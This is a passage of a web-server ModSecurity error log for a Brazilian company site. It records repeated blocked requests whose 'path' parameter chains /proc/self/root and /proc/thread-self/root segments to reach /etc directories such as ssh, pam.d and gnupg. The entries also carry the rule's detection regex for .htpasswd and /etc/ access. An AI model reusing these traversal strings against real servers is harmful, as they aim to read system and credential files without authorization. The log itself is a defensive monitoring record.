"PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHEdSswJuvopo3lOhTbwAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:15.033563 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:35654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHEwlT9VtDQc7bgUygKAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:16.201348 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:35670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHFAlT9VtDQc7bgUygKQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:18.511185 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:35674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHFhXjF1vJNtV6CWrsvgAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:19.854106 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:41142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHF7ABkC4fWIHEf8Hf0gAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:22.064322 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:41144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHGglT9VtDQc7bgUygKwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:23.407237 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.241.46:41150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHGxXjF1vJNtV6CWrsvwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:24.542421 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:41160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHHI6lpbStxTqkSkthCwAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:25.875537 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.241.46:41170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHHQlT9VtDQc7bgUygLAAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:28.132619 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:41182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHIP9ocpUE4ed4uDzg4gAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:32.699536 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:38656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHJLABkC4fWIHEf8Hf1gAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:34.031053 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:38660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHJnbQATo66fKoS7xArwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:37.338418 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.241.46:38674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHKRXjF1vJNtV6CWrsxQAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:38.577909 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:47698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHKtSswJuvopo3lOhThQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:47.673860 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.241.46:47702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHMwlT9VtDQc7bgUygOAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:51.080289 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:45040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHN3bQATo66fKoS7xAtQAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:35:56.020835 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.241.46:45042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHO3bQATo66fKoS7xAuQAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:57.030365 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:45822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHPZqj1wV0Si-OkefdmwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:35:57.278088 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.228.16:55762] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgHPbysWC90G-1nBrA5fwAAAYM"]
[Mon Mar 16 10:36:01.441061 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:38178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHQXjZBu2q05ozVU9JHwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:04.692549 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.241.46:45058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHRAlT9VtDQc7bgUygQwAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:07.044596 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.241.46:37490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHR3jZBu2q05ozVU9JIgAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:08.374169 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:50408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHSHjZBu2q05ozVU9JIwAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:36:09.198845 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:37754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHSRXjF1vJNtV6CWrszwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
